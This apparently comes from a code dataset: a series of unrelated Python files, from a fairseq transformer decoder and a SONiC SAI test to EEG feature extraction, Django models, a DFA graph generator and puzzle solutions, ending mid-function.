            rescale(layer.self_attn.v_proj.weight.data, layer_id + 1)
            rescale(layer.fc1.weight.data, layer_id + 1)
            rescale(layer.fc2.weight.data, layer_id + 1)
        return

    def build_output_projection(self, cfg, dictionary, embed_tokens):
        """Build the vocabulary projection: adaptive softmax, tied to the
        input embedding, or a fresh linear layer; then insert any BaseLayers."""
        if cfg.adaptive_softmax_cutoff is not None:
            # adaptive softmax path: output_projection stays None and
            # output_layer() returns raw features instead
            self.adaptive_softmax = AdaptiveSoftmax(
                len(dictionary),
                self.output_embed_dim,
                utils.eval_str_list(cfg.adaptive_softmax_cutoff, type=int),
                dropout=cfg.adaptive_softmax_dropout,
                adaptive_inputs=embed_tokens if cfg.tie_adaptive_weights else None,
                factor=cfg.adaptive_softmax_factor,
                tie_proj=cfg.tie_adaptive_proj,
            )
        elif self.share_input_output_embed:
            self.output_projection = nn.Linear(
                self.embed_tokens.weight.shape[1],
                self.embed_tokens.weight.shape[0],
                bias=False,
            )
            # weight tying: projection shares storage with the embedding
            self.output_projection.weight = self.embed_tokens.weight
        else:
            self.output_projection = nn.Linear(
                self.output_embed_dim, len(dictionary), bias=False
            )
            nn.init.normal_(
                self.output_projection.weight, mean=0, std=self.output_embed_dim ** -0.5
            )
        # evenly interleave BaseLayer (expert) layers into the decoder stack
        num_base_layers = cfg.base_layers
        for i in range(num_base_layers):
            self.layers.insert(
                ((i + 1) * cfg.decoder.layers) // (num_base_layers + 1),
                BaseLayer(cfg),
            )

    def build_decoder_layer(self, cfg, no_encoder_attn=False):
        """Create one decoder layer, optionally wrapped for activation
        checkpointing and FSDP."""
        layer = transformer_layer.TransformerDecoderLayerBase(cfg, no_encoder_attn)
        checkpoint = cfg.checkpoint_activations
        if checkpoint:
            offload_to_cpu = cfg.offload_activations
            layer = checkpoint_wrapper(layer, offload_to_cpu=offload_to_cpu)
        # if we are checkpointing, enforce that FSDP always wraps the
        # checkpointed layer, regardless of layer size
        min_params_to_wrap = cfg.min_params_to_wrap if not checkpoint else 0
        layer = fsdp_wrap(layer, min_num_params=min_params_to_wrap)
        return layer

    def forward(
        self,
        prev_output_tokens,
        encoder_out: Optional[Dict[str, List[Tensor]]] = None,
        incremental_state: Optional[Dict[str, Dict[str, Optional[Tensor]]]] = None,
        features_only: bool = False,
        full_context_alignment: bool = False,
        alignment_layer: Optional[int] = None,
        alignment_heads: Optional[int] = None,
        src_lengths: Optional[Any] = None,
        return_all_hiddens: bool = False,
    ):
        """
        Args:
            prev_output_tokens (LongTensor): previous decoder outputs of shape
                `(batch, tgt_len)`, for teacher forcing
            encoder_out (optional): output from the encoder, used for
                encoder-side attention, should be of size T x B x C
            incremental_state (dict): dictionary used for storing state during
                :ref:`Incremental decoding`
            features_only (bool, optional): only return features without
                applying output layer (default: False).
            full_context_alignment (bool, optional): don't apply
                auto-regressive mask to self-attention (default: False).
        Returns:
            tuple:
                - the decoder's output of shape `(batch, tgt_len, vocab)`
                - a dictionary with any model-specific outputs
        """
        x, extra = self.extract_features(
            prev_output_tokens,
            encoder_out=encoder_out,
            incremental_state=incremental_state,
            full_context_alignment=full_context_alignment,
            alignment_layer=alignment_layer,
            alignment_heads=alignment_heads,
        )
        if not features_only:
            x = self.output_layer(x)
        return x, extra

    def extract_features(
        self,
        prev_output_tokens,
        encoder_out: Optional[Dict[str, List[Tensor]]],
        incremental_state: Optional[Dict[str, Dict[str, Optional[Tensor]]]] = None,
        full_context_alignment: bool = False,
        alignment_layer: Optional[int] = None,
        alignment_heads: Optional[int] = None,
    ):
        return self.extract_features_scriptable(
            prev_output_tokens,
            encoder_out,
            incremental_state,
            full_context_alignment,
            alignment_layer,
            alignment_heads,
        )

    """
    A scriptable subclass of this class has an extract_features method and calls
    super().extract_features, but super() is not supported in torchscript. A copy of
    this function is made to be used in the subclass instead.
    """

    def extract_features_scriptable(
        self,
        prev_output_tokens,
        encoder_out: Optional[Dict[str, List[Tensor]]],
        incremental_state: Optional[Dict[str, Dict[str, Optional[Tensor]]]] = None,
        full_context_alignment: bool = False,
        alignment_layer: Optional[int] = None,
        alignment_heads: Optional[int] = None,
    ):
        """
        Similar to *forward* but only return features.
        Includes several features from "Jointly Learning to Align and
        Translate with Transformer Models" (Garg et al., EMNLP 2019).
        Args:
            full_context_alignment (bool, optional): don't apply
                auto-regressive mask to self-attention (default: False).
            alignment_layer (int, optional): return mean alignment over
                heads at this layer (default: last layer).
            alignment_heads (int, optional): only average alignment over
                this many heads (default: all heads).
        Returns:
            tuple:
                - the decoder's features of shape `(batch, tgt_len, embed_dim)`
                - a dictionary with any model-specific outputs
        """
        bs, slen = prev_output_tokens.size()
        if alignment_layer is None:
            alignment_layer = self.num_layers - 1
        enc: Optional[Tensor] = None
        padding_mask: Optional[Tensor] = None
        if encoder_out is not None and len(encoder_out["encoder_out"]) > 0:
            enc = encoder_out["encoder_out"][0]
            assert (
                enc.size()[1] == bs
            ), f"Expected enc.shape == (t, {bs}, c) got {enc.shape}"
        if encoder_out is not None and len(encoder_out["encoder_padding_mask"]) > 0:
            padding_mask = encoder_out["encoder_padding_mask"][0]
        # embed positions
        positions = None
        if self.embed_positions is not None:
            positions = self.embed_positions(
                prev_output_tokens, incremental_state=incremental_state
            )
        # incremental decoding: only the newest token is fed through
        if incremental_state is not None:
            prev_output_tokens = prev_output_tokens[:, -1:]
            if positions is not None:
                positions = positions[:, -1:]
        # embed tokens and positions
        x = self.embed_scale * self.embed_tokens(prev_output_tokens)
        if self.quant_noise is not None:
            x = self.quant_noise(x)
        if self.project_in_dim is not None:
            x = self.project_in_dim(x)
        if positions is not None:
            x += positions
        if self.layernorm_embedding is not None:
            x = self.layernorm_embedding(x)
        x = self.dropout_module(x)
        # B x T x C -> T x B x C
        x = x.transpose(0, 1)
        self_attn_padding_mask: Optional[Tensor] = None
        if self.cross_self_attention or prev_output_tokens.eq(self.padding_idx).any():
            self_attn_padding_mask = prev_output_tokens.eq(self.padding_idx)
        # decoder layers
        attn: Optional[Tensor] = None
        inner_states: List[Optional[Tensor]] = [x]
        for idx, layer in enumerate(self.layers):
            # causal mask only for parallel (non-incremental) decoding
            if incremental_state is None and not full_context_alignment:
                self_attn_mask = self.buffered_future_mask(x)
            else:
                self_attn_mask = None
            x, layer_attn, _ = layer(
                x,
                enc,
                padding_mask,
                incremental_state,
                self_attn_mask=self_attn_mask,
                self_attn_padding_mask=self_attn_padding_mask,
                need_attn=bool((idx == alignment_layer)),
                need_head_weights=bool((idx == alignment_layer)),
            )
            inner_states.append(x)
            if layer_attn is not None and idx == alignment_layer:
                attn = layer_attn.float().to(x)
        if attn is not None:
            if alignment_heads is not None:
                attn = attn[:alignment_heads]
            # average probabilities over heads
            attn = attn.mean(dim=0)
        if self.layer_norm is not None:
            x = self.layer_norm(x)
        # NOTE(review): `self.alpha` is never assigned anywhere in this class,
        # so this line raises AttributeError when reached -- presumably a
        # subclass or external patch is expected to set it (DeepNet-style
        # residual scaling); confirm before relying on this path.
        if self.alpha is not None:
            x = torch.mul(self.alpha, x)
        # T x B x C -> B x T x C
        x = x.transpose(0, 1)
        if self.project_out_dim is not None:
            x = self.project_out_dim(x)
        return x, {"attn": [attn], "inner_states": inner_states}

    def output_layer(self, features):
        """Project features to the vocabulary size."""
        if self.adaptive_softmax is None:
            # project back to size of vocabulary
            return self.output_projection(features)
        else:
            return features

    def max_positions(self):
        """Maximum output length supported by the decoder."""
        if self.embed_positions is None:
            return self.max_target_positions
        return min(self.max_target_positions, self.embed_positions.max_positions)

    def buffered_future_mask(self, tensor):
        """Return (and cache) an upper-triangular -inf mask of size dim x dim
        used to enforce causal self-attention."""
        dim = tensor.size(0)
        # self._future_mask.device != tensor.device is not working in TorchScript. This is a workaround.
        if (
            self._future_mask.size(0) == 0
            or (not self._future_mask.device == tensor.device)
            or self._future_mask.size(0) < dim
        ):
            self._future_mask = torch.triu(
                utils.fill_with_neg_inf(torch.zeros([dim, dim])), 1
            )
        self._future_mask = self._future_mask.to(tensor)
        return self._future_mask[:dim, :dim]

    def upgrade_state_dict_named(self, state_dict, name):
        """Upgrade a (possibly old) state dict for new versions of fairseq."""
        if isinstance(self.embed_positions, SinusoidalPositionalEmbedding):
            weights_key = "{}.embed_positions.weights".format(name)
            if weights_key in state_dict:
                del state_dict[weights_key]
            state_dict[
                "{}.embed_positions._float_tensor".format(name)
            ] = torch.FloatTensor(1)
        if f"{name}.output_projection.weight" not in state_dict:
            if self.share_input_output_embed:
                embed_out_key = f"{name}.embed_tokens.weight"
            else:
                embed_out_key = f"{name}.embed_out"
            if embed_out_key in state_dict:
                state_dict[f"{name}.output_projection.weight"] = state_dict[
                    embed_out_key
                ]
                if not self.share_input_output_embed:
                    del state_dict[embed_out_key]
        for i in range(self.num_layers):
            # update layer norms
            layer_norm_map = {
                "0": "self_attn_layer_norm",
                "1": "encoder_attn_layer_norm",
                "2": "final_layer_norm",
            }
            for old, new in layer_norm_map.items():
                for m in ("weight", "bias"):
                    k = "{}.layers.{}.layer_norms.{}.{}".format(name, i, old, m)
                    if k in state_dict:
                        state_dict[
                            "{}.layers.{}.{}.{}".format(name, i, new, m)
                        ] = state_dict[k]
                        del state_dict[k]
        version_key = "{}.version".format(name)
        if utils.item(state_dict.get(version_key, torch.Tensor([1]))[0]) <= 2:
            # earlier checkpoints did not normalize after the stack of layers
            self.layer_norm = None
            self.normalize = False
            state_dict[version_key] = torch.Tensor([1])
        return state_dict
def Linear(in_features, out_features, bias=True):
    """Build an nn.Linear layer with Xavier-uniform weights and, when a bias
    is requested, a zero-initialized bias."""
    layer = nn.Linear(in_features, out_features, bias)
    nn.init.xavier_uniform_(layer.weight)
    if bias:
        nn.init.constant_(layer.bias, 0.0)
    return layer
class TransformerDecoder(TransformerDecoderBase):
    """Legacy argparse-``Namespace`` front-end for ``TransformerDecoderBase``.

    Each entry point converts the namespace into a ``TransformerConfig``
    before delegating, so old-style callers keep working with the
    dataclass-based decoder implementation.
    """

    def __init__(
        self,
        args,
        dictionary,
        embed_tokens,
        no_encoder_attn=False,
        output_projection=None,
    ):
        self.args = args
        cfg = TransformerConfig.from_namespace(args)
        super().__init__(
            cfg,
            dictionary,
            embed_tokens,
            no_encoder_attn=no_encoder_attn,
            output_projection=output_projection,
        )

    def build_output_projection(self, args, dictionary, embed_tokens):
        cfg = TransformerConfig.from_namespace(args)
        super().build_output_projection(cfg, dictionary, embed_tokens)

    def build_decoder_layer(self, args, no_encoder_attn=False):
        cfg = TransformerConfig.from_namespace(args)
        return super().build_decoder_layer(cfg, no_encoder_attn=no_encoder_attn)
|
22,473 | 3b248e5a48c92b156b5aa10b951167e79ca37756 | #/usr/bin/env python
# -*- coding: utf-8 -*-
import os
f=open("config.txt")
fichero=f.read()
lineas=fichero.split("\n")
estados=lineas[0][1:len(lineas[0])-1]
estados=estados.split(",")
nuevos=[]
for e in estados:
nuevos.append(e.replace("\"",""))
estados=nuevos
print estados
alfabeto=lineas[1][1:len(lineas[1])-1]
alfabeto=alfabeto.split(",")
nuevos=[]
for e in alfabeto:
nuevos.append(e.replace("\"",""))
alfabeto=nuevos
print alfabeto
estadoInicial=lineas[2][1:len(lineas[2])-1].replace("\"","")
print estadoInicial
finales=lineas[3][1:len(lineas[3])-1]
finales=finales.split(",")
nuevos=[]
for e in finales:
nuevos.append(e.replace("\"",""))
estadosFinales=nuevos
print finales
nuevos=[]
transiciones=lineas[4][1:len(lineas[4])-1]
for n,e in enumerate(transiciones.split("Transicion {inicio = \"")):
if not e=="" and not e[0]=="\"":
nuevos.append([str(e[0])])
i=0
for n,e in enumerate(transiciones.split("fin = \"")[1:]):
if not e=="" and not e[0]=="\"" and n<=len(nuevos)-1:
nuevos[i].append(e[0])
i+=1
i=0
for n,e in enumerate(transiciones.split("simbolo = \"")[1:]):
if not e=="" and not e[0]=="\""and n<=len(nuevos)-1:
nuevos[i].append(e[0])
i+=1
transicionesNoConexas=nuevos
print transicionesNoConexas
nuevos=[]
i=0
transiciones=lineas[5][1:len(lineas[5])-1]
for n,e in enumerate(transiciones.split("Transicion {inicio = \"")):
if not e=="" and not e[0]=="\"":
nuevos.append([str(e[0])])
i=0
for n,e in enumerate(transiciones.split("fin = \"")[1:]):
if not e=="" and not e[0]=="\"" and n<=len(nuevos)-1:
nuevos[i].append(e[0])
i+=1
i=0
for n,e in enumerate(transiciones.split("simbolo = \"")[1:]):
if not e=="" and not e[0]=="\""and n<=len(nuevos)-1:
nuevos[i].append(e[0])
i+=1
transicionesConexas=nuevos
print transicionesConexas
estadosC=lineas[6][1:len(lineas[6])-1]
estadosC=estadosC.split(",")
nuevos=[]
for e in estadosC:
nuevos.append(e.replace("\"",""))
estadosConexos=nuevos
print estadosConexos
transiciones=transicionesNoConexas
png="conexo"
print "creando grafo"
inicio="subgraph \""+png+"\" { \n"
fin="}"
cuerpo=""
for trans in transiciones :
cuerpo+="\""+png+"-"+trans[0]+"\"->\""+png+"-"+trans[1]+"\"[label=\""+trans[2]+"\"]"+";\n"
finales=""
for e in estadosFinales:
finales+="\""+png+"-"+e+"\"[peripheries=2];\n"
inicial="node [style=invis]; \""+png+"-00\";\n \""+png+"-00\"->\""+png+"-"+estadoInicial+"\";"
f = open (png+"-conf.txt", "w")
f.write(inicio)
f.write(cuerpo)
f.write(finales)
for e in estados:
f.write("\""+png+"-"+e+"\"[label = \""+e+"\"];")
f.write(inicial)
f.write("label = \""+png+"\";")
f.write(fin)
f.close()
#creamos no conexo
transiciones=transicionesConexas
png="Noconexo"
print "creando grafo"
inicio="subgraph \""+png+"\" { \n"
fin="}"
cuerpo=""
for trans in transiciones :
cuerpo+="\""+png+"-"+trans[0]+"\"->\""+png+"-"+trans[1]+"\"[label=\""+trans[2]+"\"]"+";\n"
finales=""
for e in estadosFinales:
finales+="\""+png+"-"+e+"\"[peripheries=2];\n"
inicial="node [style=invis]; \""+png+"-00\";\n \""+png+"-00\"->\""+png+"-"+estadoInicial+"\";"
f = open (png+"-conf.txt", "w")
f.write(inicio)
f.write(cuerpo)
f.write(finales)
for e in estados:
if e in estadosConexos:
f.write("\""+png+"-"+e+"\"[label = \""+e+"\"];")
f.write(inicial)
f.write("label = \""+png+"\";")
f.write(fin)
f.close()
f=open("par-AFD.txt","w")
f.write("digraph{compound=true; \n")
f.close()
os.system("cat conexo-conf.txt >> par-AFD.txt")
f=open("par-AFD.txt","a")
f.write("\n")
f.close()
os.system("cat Noconexo-conf.txt >> par-AFD.txt")
f=open("par-AFD.txt","a")
f.write("\n}")
f.close()
os.system("dot par-AFD.txt -Tpng -o AFD-conexo.png")
os.system("eog AFD-conexo.png && rm par-AFD.txt && rm Noconexo-conf.txt && rm conexo-conf.txt")
|
22,474 | 600ebac9ad7487645b5758ca92c8a43c38270510 | from output.models.ibm_data.valid.s3_4_2_4.s3_4_2_4v13_xsd.s3_4_2_4v13 import Root
# Smoke-test: instantiate the generated Root model, explicitly overriding
# its two defaulted boolean attributes.
obj = Root(
    default_attr1=True,
    default_attr2=True
)
|
def Rule(Neighbour_Counts, grid):
    """One cellular-automaton step over `grid` (values 0/1).

    A dead cell with exactly three live neighbours is born; live cells
    always survive (there is no death rule). `Neighbour_Counts(x, y)` must
    return the live-neighbour count of cell (x, y). The input grid is not
    modified; a fresh grid is returned.
    """
    next_grid = [[0] * len(row) for row in grid]
    for x, row in enumerate(grid):
        for y, state in enumerate(row):
            alive_neighbours = Neighbour_Counts(x, y)
            if state == 0 and alive_neighbours == 3:
                next_grid[x][y] = 1
            else:
                next_grid[x][y] = state
    return next_grid
22,476 | 04041274f106f58cf9f1802dbd9687b3d14d31ca | # -*- coding: utf-8 -*-
class ColoredManaSymbol(object):
    """Wrap WUBRG mana letters in ANSI escape codes for terminal display."""

    YELLOW = '\033[33m'
    BLUE = '\033[94m'
    GREEN = '\033[92m'
    RED = '\033[91m'
    BLACK = '\033[30m'
    ENDC = '\033[0m'
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'

    def color(self, string):
        """Return `string` with every W/U/B/R/G letter colorized; all other
        characters pass through unchanged."""
        painters = {
            'U': self.blue,
            'R': self.red,
            'W': self.yellow,
            'B': self.black,
            'G': self.green,
        }
        pieces = []
        for letter in string:
            paint = painters.get(letter)
            pieces.append(paint(letter) if paint else letter)
        return ''.join(pieces)

    def yellow(self, string):
        return '{0}{1}{2}'.format(self.YELLOW, string, self.ENDC)

    def blue(self, string):
        return '{0}{1}{2}'.format(self.BLUE, string, self.ENDC)

    def green(self, string):
        return '{0}{1}{2}'.format(self.GREEN, string, self.ENDC)

    def red(self, string):
        return '{0}{1}{2}'.format(self.RED, string, self.ENDC)

    def black(self, string):
        return '{0}{1}{2}'.format(self.BLACK, string, self.ENDC)
22,477 | 8bf6f6dd03eefeb9b31e52dd26707e6d4e441f99 | from collections import namedtuple
User = namedtuple("User", ['name', 'age', 'height', 'edu'])
# A namedtuple behaves like a lightweight class definition.

# BUG FIX: the original call omitted the required 'edu' field, which raises
# TypeError -- every field of a namedtuple must be supplied.
user = User(name='zh', age=29, height=158, edu='bachelor')

# A plain tuple can initialize an instance via *-unpacking...
user_tuple = ('zheng', 23, 190)
user = User(*user_tuple, edu='master')

# ...and a dict via **-unpacking.
# BUG FIX: the original used *user_dict, which unpacks the dict KEYS as
# positional arguments ('name', 'age', 'height'), not the values.
user_dict = {
    "name": "zheng",
    "age": 32,
    "height": 179
}
user = User(**user_dict, edu='master')
print(user.age, user.height)
# namedtuples also support regular tuple unpacking.
class ByteSize:
    # Number of data bits per serial character (Win32 DCB ByteSize values).
    FIVE = 5
    SIX = 6
    SEVEN = 7
    EIGHT = 8
class Parity:
    # Serial parity modes; the values mirror the Win32 DCB Parity constants.
    NOPARITY = 0
    ODDPARITY = 1
    EVENPARITY = 2
    MARKPARITY = 3
    SPACEPARITY = 4
class StopBits:
    # Stop-bit settings. NOTE(review): in the Win32 DCB these values are
    # ONESTOPBIT=0, ONE5STOPBITS=1 (1.5 bits), TWOSTOPBITS=2 -- the middle
    # name here ("ONESTOPBITS") presumably means 1.5 stop bits; confirm.
    ONESTOPBIT = 0
    ONESTOPBITS = 1
    TWOSTOPBITS = 2
class fDtrControl:
    # DTR (Data Terminal Ready) line control modes (Win32 DCB fDtrControl).
    DTR_CONTROL_DISABLE = 0x00
    DTR_CONTROL_ENABLE = 0x01
    DTR_CONTROL_HANDSHAKE = 0x02
class BaudRate:
    """Supported serial baud rates (Win32 CBR_* constants); each CBR_x == x."""
    # BUG FIX: CBR_110 was 100, inconsistent with its name and with the
    # Win32 CBR_110 constant (every other CBR_x here equals x).
    CBR_110 = 110
    CBR_300 = 300
    CBR_600 = 600
    CBR_1200 = 1200
    CBR_2400 = 2400
    CBR_4800 = 4800
    CBR_9600 = 9600
    CBR_14400 = 14400
    CBR_19200 = 19200
    CBR_38400 = 38400
    CBR_57600 = 57600
    CBR_115200 = 115200
    CBR_128000 = 128000
    CBR_256000 = 256000
22,479 | b0135a5de059c4a33167ad8b0eca82a52e16ef23 | import pytest
import logging
from .cases_sai_ptf import TEST_CASE
from .conftest import get_sai_test_container_name
from .conftest import stop_and_rm_sai_test_container
from .sai_infra import run_case_from_ptf, store_test_result
from .sai_infra import * # noqa: F403 F401
from .conftest import * # noqa: F403 F401
logger = logging.getLogger(__name__)

# Module-level pytest marks: PTF topology only, and skip the usual sanity /
# DUT-health / loganalyzer machinery (the SAI PTF run manages the DUT itself).
pytestmark = [
    pytest.mark.topology("ptf"),
    pytest.mark.sanity_check(skip_sanity=True),
    pytest.mark.disable_loganalyzer,
    pytest.mark.skip_check_dut_health
]
@pytest.mark.parametrize("ptf_sai_test_case", TEST_CASE)
def test_sai(sai_testbed,
             sai_test_env_check,
             creds,
             duthost,
             ptfhost,
             ptf_sai_test_case,
             request,
             create_sai_test_interface_param):
    """
    Trigger sai ptf test here.

    Args:
        sai_testbed: Fixture which can help prepare the sai testbed.
        sai_test_env_check: Fixture, use to check the test env.
        creds (dict): Credentials used to access the docker registry.
        duthost (SonicHost): The target device.
        ptfhost (AnsibleHost): The PTF server.
        ptf_sai_test_case: Test case name used to make test.
        request: Pytest request.
        create_sai_test_interface_param: Testbed switch interface
    """
    dut_ip = duthost.host.options['inventory_manager'].get_host(
        duthost.hostname).vars['ansible_host']
    try:
        sai_test_interface_para = create_sai_test_interface_param
        run_case_from_ptf(
            duthost, dut_ip, ptfhost,
            ptf_sai_test_case, sai_test_interface_para, request)
    # BaseException is deliberately broad here so that even keyboard
    # interrupts still reach the container-cleanup in `finally`.
    except BaseException as e:
        logger.info(
            "Test case [%s] failed, trying to restart sai test container, "
            "failed as %s.", ptf_sai_test_case, e)
        # BUG FIX: pytest.fail()'s second positional parameter is the boolean
        # `pytrace`, not an exception object; passing `e` there raises its
        # own error. Fold the exception into the failure message instead.
        pytest.fail("Test case [{}] failed: {}".format(ptf_sai_test_case, e))
    finally:
        # Always tear down the test container and persist results.
        stop_and_rm_sai_test_container(
            duthost, get_sai_test_container_name(request))
        store_test_result(ptfhost)
import datetime

# Benchmark: time counting to `endnumber` with print() inside a for loop
# vs. inside a while loop, repeating each measurement r times.
r = input("Wie oft soll das ding laufen: ")
r = int(r)
endnumber = 10000
for_results = []
while_results = []

# --- for-loop benchmark, repeated r times ---
for _ in range(r):
    start = datetime.datetime.now()
    for x in range(endnumber):
        print(x)
    end = datetime.datetime.now()
    print("No console Output has been performed")
    print("Counted to: " + str(endnumber))
    print("Started: " + str(start))
    print("Ended: " + str(end))
    delta = end - start
    deltams = delta.total_seconds() * 1000
    print("Time it took: " + str(deltams) + "ms")
    print("Time it took: " + str(delta))
    for_results.append(delta)

print("Die finalen Werte für for gesammelt:")
for h in for_results:
    print(h)

# --- while-loop benchmark, repeated r times ---
for _ in range(r):
    x = 0
    start2 = datetime.datetime.now()
    while x < endnumber:
        x = x + 1
        print(x)
    end2 = datetime.datetime.now()
    print("No console Output has been performed")
    print("Counted to: " + str(endnumber))
    print("Started: " + str(start2))
    print("Ended: " + str(end2))
    delta2 = end2 - start2
    # BUG FIX: the original computed deltasec2 from the FIRST benchmark's
    # `delta`, so the while-loop's ms figure reported the for-loop's time.
    deltams2 = delta2.total_seconds() * 1000
    print("Time it took: " + str(deltams2) + "ms")
    print("Time it took: " + str(delta2))
    while_results.append(delta2)

# Final summary of both runs.
print("Die finalen Werte für for gesammelt:")
for h in for_results:
    print(h)
print("")
print("Die finalen Werte für while gesammelt:")
for k in while_results:
    print(k)
22,481 | 0bcea7176d282ff756b62c0d955279dfefb337e4 | # -*- coding: utf-8 -*-
"""
Created on Thu May 12 12:58:59 2016
@author: malz
Function: This is the main program to run for extracting features from Neurosky EEG data.
"""
import numpy as np
import csv
import random
import os.path as path
import grouper
import brainlib
import sys
vector_resolution=3;
write_path = '/home/malz/workspace_mars/Java_Practice/src'
read_path = '/home/malz/workspace_mars/Java_Practice/src'
#list_of_Users=['User1/Testing','User1/Training','User2/Testing','User2/Training','User3/Testing','User3/Training']
list_of_Users=['User5/Training']
list_of_sessions=['Activity_Two']
list_of_files=['Neurosky/Neurosky.csv.csv']
list_of_filesO=['Neurosky/Neurosky_Fea.csv']
def parse_raw_values(reading):
    """Parse the 'raw_values' CSV field ("{v1,v2,...}") into a float array."""
    vals = reading['raw_values'].split(',')
    # The field is serialized with surrounding braces; strip them from the
    # first and last tokens.
    vals[0] = vals[0][1:]
    vals[-1] = vals[-1][:-1]
    # BUG FIX: np.float was deprecated and removed (NumPy >= 1.24); the
    # builtin float is what it aliased anyway.
    return np.array(vals).astype(float)
def spectra(readings):
    """Parse each reading's raw samples and return its power spectrum."""
    result = []
    for reading in readings:
        result.append(brainlib.pSpectrum(parse_raw_values(reading)))
    return result
def data_path_generator(fol, user_path, session, file1):
    """Join the base path, user folder, session and file name into one path."""
    return path.join(user_path, str(fol), str(session), str(file1))
def readAllReadings(reader1):
    # Generator over every row of a csv.DictReader.
    print 'in second'
    for row in reader1:
        yield row
def make_feature_vector(readings):  # A function we apply to each group of power spectra
    '''
    Create 100, log10-spaced bins for each power spectrum.
    For more on how this particular implementation works, see:
    http://coolworld.me/pre-processing-EEG-consumer-devices/
    '''
    # Pipeline: power spectrum per reading -> 100 bins each -> one averaged,
    # log10-scaled spectrum for the whole group.
    spect = spectra(readings)
    print len(spect[1])
    bin = brainlib.binnedPowerSpectra(spect, 100)
    print len(bin[2])
    Y = brainlib.avgPowerSpectrum(bin, np.log10)
    print type(Y)
    return Y
def readings(filePath):
    # Load a CSV file and return all of its rows as a list of dicts.
    print 'In readAllreadings'
    with open(filePath, 'r') as file:
        reader = csv.DictReader(file)
        # Materialize inside the `with` so the file is still open while
        # the generator is consumed.
        return [r for r in readAllReadings(reader)]
def featureStep1(read1):
    # Group readings into non-overlapping windows of 3 rows and yield one
    # feature vector per complete window.
    print 'I am here'
    groups = grouper.grouper(3, read1)
    for g in groups:
        # grouper pads the final group with None; drop the padding.
        readings1 = filter(None, g)
        print '============================================================'
        # throw out readings with fewer signals than our desired resolution
        if len(readings1) == vector_resolution:
            yield make_feature_vector(readings1)
def FeatureStore(pathS, arrayOfGen):
    # Materialize the feature-vector generator and dump it as CSV rows.
    # NOTE(review): 'wb' + csv.writer is the Python 2 idiom; under Python 3
    # this would need mode 'w' with newline=''. The file is not explicitly
    # closed here.
    list1 = list(arrayOfGen)
    outFile = open(pathS, 'wb')
    wr = csv.writer(outFile)
    wr.writerows(list1)
# Driver: for every (user, session, input-file) combination, extract the
# feature vectors and store them next to the raw data. The ranges currently
# only cover index 0 of each configuration list.
for i in range(0, 1):
    for k in range(0, 1):
        for j in range(0, 1):
            print list_of_Users[i] + list_of_sessions[k]
            print data_path_generator(list_of_Users[i], read_path, list_of_sessions[k], list_of_files[j]);
            read1 = readings(data_path_generator(list_of_Users[i], read_path, list_of_sessions[k], list_of_files[j]))
            arrayOfGen = featureStep1(read1)
            FeatureStore(data_path_generator(list_of_Users[i], read_path, list_of_sessions[k], list_of_filesO[j]), arrayOfGen)
print 'Hello'
#!/usr/bin/python
from PIL import Image
import re

img = Image.open("oxygen.png", 'r')
# Sample the middle row of the image.
# BUG FIX: img.height/2 is a float under Python 3 and getpixel needs integer
# coordinates; use floor division.
row = [img.getpixel((x, img.height // 2)) for x in range(img.width)]
# The message is encoded in 7-pixel-wide blocks; keep one pixel per block.
row = row[::7]
# Grey pixels (r == g == b) carry one payload byte in each channel.
ords = [r for r, g, b, a in row if r == g == b]
# Map ASCII codes back to text.
text = "".join(map(chr, ords))
print(text)
# The decoded text embeds the next level's character codes as integers.
# (Raw string for the regex -- "\d" in a plain literal is an invalid escape.)
next_level_nums = re.findall(r"\d+", text)
print(next_level_nums)
next_level = "".join(map(chr, map(int, next_level_nums)))
print(next_level)
22,483 | 1d02fff2cb87d9e76850094899e5cd1306d7e4ea | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
@python_2_unicode_compatible
class ServiceType(models.Model):
    # Dictionary table: a kind/category of service.
    class Meta():
        db_table = 'service_type'
        verbose_name = "Тип услуги"

    # Human-readable name of the service type.
    name = models.CharField(max_length=200, verbose_name="Наименование")

    def __str__(self):
        return self.name
@python_2_unicode_compatible
class Service(models.Model):
    # A concrete service offering, linked to its ServiceType.
    class Meta():
        db_table = 'service'
        verbose_name = "Услуга"

    name = models.CharField(max_length=200, verbose_name="Наименование")
    description = models.TextField(verbose_name="Описание")
    # NOTE(review): no auto_now_add here, so callers must set created_date
    # explicitly -- confirm that is intended.
    created_date = models.DateTimeField(verbose_name="Дата создания")
    # default=1 assumes a ServiceType row with pk=1 exists (fixture/migration).
    service_type = models.ForeignKey(
        ServiceType, default=1, verbose_name="Тип услуги")

    def __str__(self):
        return self.name
22,484 | 949fb18f78f48ad8d77bbca45f4510346114f204 | class Recipes(object):
def __init__(self):
self.size = 0
self.first_recipe = None
def __repr__(self):
return "%s" % self.scores
def scores(self):
curr = self.first_recipe
scores = []
for _ in range(self.size):
scores.append(curr.score)
curr = curr.next
return scores
def add_to_end(self, score):
if self.first_recipe is None:
self.first_recipe = Recipe(score, None, None)
else:
last_recipe = self.first_recipe.prev
new_recipe = Recipe(score, last_recipe, self.first_recipe)
last_recipe.next = new_recipe
self.first_recipe.prev = new_recipe
self.size += 1
def print_last_x(self, x):
print_from = self.first_recipe
to_print = []
for _ in range(x):
print_from = print_from.prev
to_print.append(print_from.score)
to_print.reverse()
print to_print
def last_x(self, x):
print_from = self.first_recipe
sequence = ""
for _ in range(x):
print_from = print_from.prev
sequence = str(print_from.score) + sequence
return sequence
class Recipe(object):
    """One node of the circular score list; links to itself when alone."""

    def __init__(self, score, prev, next):
        self.score = score
        # A node with no neighbours closes the ring on itself.
        self.prev = prev if prev else self
        self.next = next if next else self

    def __repr__(self):
        return "%s" % self.score

    def move_ahead(self, distance=1):
        """Follow `next` pointers `distance` times and return that node."""
        node = self
        for _ in range(distance):
            node = node.next
        return node
def split_digits(digits):
    """Split a number into its decimal digits, most significant first."""
    if digits == 0:
        return [0]
    result = []
    while digits > 0:
        digits, last = divmod(digits, 10)
        result.append(last)
    result.reverse()
    return result
def add_new_recipes(scores, recipes):
    """Append each decimal digit of `scores` to the recipe ring."""
    for digit in split_digits(scores):
        recipes.add_to_end(digit)
def part1(num_recipes):
    """Return the ten scores that follow the first `num_recipes` recipes."""
    recipes = Recipes()
    add_new_recipes(37, recipes)  # initial scoreboard: 3, 7
    elf1 = recipes.first_recipe
    elf2 = elf1.next
    # Keep combining the elves' current recipes until enough scores exist.
    while recipes.size < num_recipes + 10:
        score1, score2 = elf1.score, elf2.score
        add_new_recipes(score1 + score2, recipes)
        elf1 = elf1.move_ahead(score1 + 1)
        elf2 = elf2.move_ahead(score2 + 1)
